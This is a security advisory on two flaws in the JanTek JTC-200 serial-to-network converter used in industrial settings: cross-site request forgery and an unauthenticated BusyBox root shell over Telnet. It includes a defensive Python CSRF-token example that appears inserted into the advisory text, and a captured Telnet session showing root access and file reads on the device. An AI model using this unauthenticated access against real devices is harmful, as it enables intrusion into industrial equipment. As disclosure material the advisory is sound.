JanTek JTC-200 RS232-NET Connector CSRF / Missing Authentication

2017-10-31 00:00:00
Karn Ganeshen
packetstormsecurity.com

EPSS: 0.002 (Low), percentile 58.7%

Vendor: JanTek  
Equipment: JTC-200  
Vulnerabilities: Cross-site Request Forgery, Improper Authentication  
  
Advisory URL:  
https://ipositivesecurity.com/2017/10/28/ics-jantek-jtc-200-rs232-net-converter-advisory-published/  
  
ICS-CERT Advisory  
https://ics-cert.us-cert.gov/advisories/ICSA-17-283-02  
  
CVE-ID  
CVE-2016-5789  
CVE-2016-5791  
  
Detailed Proof of Concept:  
https://ipositivesecurity.com/2016/07/05/rs232-net-converter-model-jtc-200-multiple-vulnerabilities/  
  
------------------------  
AFFECTED PRODUCTS  
------------------------  
  
The following versions of JTC-200, a TCP/IP converter, are affected:  
JTC-200 all versions.  
  
------------------------  
BACKGROUND  
------------------------  
Critical Infrastructure Sectors: Critical Manufacturing  
Countries/Areas Deployed: Europe and Asia  
Company Headquarters Location: Taiwan  
  
  
------------------------  
IMPACT  
------------------------  
Successful exploitation of these vulnerabilities allows remote code  
execution on the device with elevated privileges.  
  
------------------------  
VULNERABILITY OVERVIEW  
------------------------  
  
CROSS-SITE REQUEST FORGERY (CSRF) CWE-352  
An attacker could perform actions with the same permissions as a victim  
user, provided the victim has an active session and is induced to trigger  
the malicious request.  
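The usual server-side defence against the request forgery described above is to reject any state-changing request that does not carry a secret token bound to the victim's session, backed by an Origin/Referer check. The following is an added illustration, not code from the advisory or from JanTek's firmware; the request dictionaries, the server secret and the RFC 5737 documentation address are constructed stand-ins for a real HTTP request, an install-time secret and the device's address.  

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlparse

# Constructed values (assumptions for this example): a per-installation secret
# and the host the device is reached on. On a real device the secret is
# generated at first boot and stored outside the web root; DEVICE_HOST must
# include the port if the web UI is not on the default port.
SERVER_SECRET = b"constructed-example-secret-replace-in-deployment"
DEVICE_HOST = "192.0.2.10"  # RFC 5737 documentation address, not a real device


def make_csrf_token(session_id: str) -> str:
    """Synchronizer token: a random nonce plus an HMAC over (session_id, nonce).

    Binding the MAC to the session id makes a token issued to one session
    useless in another; the nonce keeps tokens unguessable."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(SERVER_SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def verify_csrf_token(session_id: str, token: str) -> bool:
    """Recompute the MAC for this session and compare in constant time."""
    nonce, sep, mac = token.partition(".")
    if not sep or not nonce or not mac:
        return False
    expected = hmac.new(SERVER_SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac, expected)


def same_origin(headers: dict, expected_host: str) -> bool:
    """Independent second check: the browser-supplied Origin (or Referer)
    must name this device. Browsers set these headers themselves, so a page
    served from another site cannot choose their value."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False
    return urlparse(source).netloc == expected_host


def authorize_state_change(request: dict) -> tuple:
    """Gate every configuration change. `request` is a constructed stand-in for
    the parsed HTTP request: method, headers, cookies and form fields.
    Returns (allowed, reason)."""
    if request["method"] not in ("POST", "PUT", "DELETE"):
        return False, "state changes must not be reachable via GET"
    session_id = request["cookies"].get("session")
    if not session_id:
        return False, "no authenticated session"
    if not same_origin(request["headers"], DEVICE_HOST):
        return False, "cross-site origin"
    if not verify_csrf_token(session_id, request["form"].get("csrf_token", "")):
        return False, "missing or invalid CSRF token"
    return True, "ok"


if __name__ == "__main__":
    sid = "session-A"
    legitimate = {"method": "POST", "headers": {"Origin": "http://192.0.2.10"},
                  "cookies": {"session": sid},
                  "form": {"csrf_token": make_csrf_token(sid), "ip": "10.0.0.5"}}
    print(authorize_state_change(legitimate))   # (True, 'ok')
```

Two checks are kept deliberately: the token defeats a cross-site form post even when the Origin header is absent (older clients, some proxies), and the origin check still blocks the request if a token ever leaks through a page that reflects it.  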
  
CVE-2016-5789 has been assigned to this vulnerability. A CVSS v3 base score  
of 8.0 has been assigned; the CVSS vector string is  
(AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H).  
  
IMPROPER AUTHENTICATION CWE-287  
An undocumented BusyBox Linux shell is reachable over the device's Telnet  
service without any authentication.  
  
CVE-2016-5791 has been assigned to this vulnerability. A CVSS v3 base score  
of 9.8 has been assigned; the CVSS vector string is  
(AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).  
  
---------  
Trying IP...  
Connected to IP.  
Escape character is '^]'.  
BusyBox v0.60.4 (2008.02.21-16:59+0000) Built-in shell (msh)  
Enter 'help' for a list of built-in commands.  
#  
BusyBox v0.60.4 (2008.02.21-16:59+0000) multi-call binary  
Usage: busybox [function] [arguments]...  
or: [function] [arguments]...  
BusyBox is a multi-call binary that combines many common Unix utilities into a single executable. Most people will create a link to busybox for each function they wish to use, and BusyBox will act like whatever it was invoked as.  
Currently defined functions:  
[, busybox, cat, cp, df, hostname, ifconfig, init, kill, killall, ls, mkdir, mknod, mount, msh, mv, ping, ps, pwd, rm, sh, test, touch, vi  
#  
# ls  
bin dev etc nfs proc swap usb var  
# cd etc  
# ls  
ConfigPage WRConfig.ini config inetd.conf inittab ppp protocols rc resolv.conf services  
# cat inetd.conf  
telnet stream tcpnowait root /bin/telnetd  
#  
---------  
  
------------------------  
Technical Details  
------------------------  
https://ipositivesecurity.com/2016/07/05/rs232-net-converter-model-jtc-200-multiple-vulnerabilities/  
  
+++++  
Best Regards,  
Karn Ganeshen  
  
  
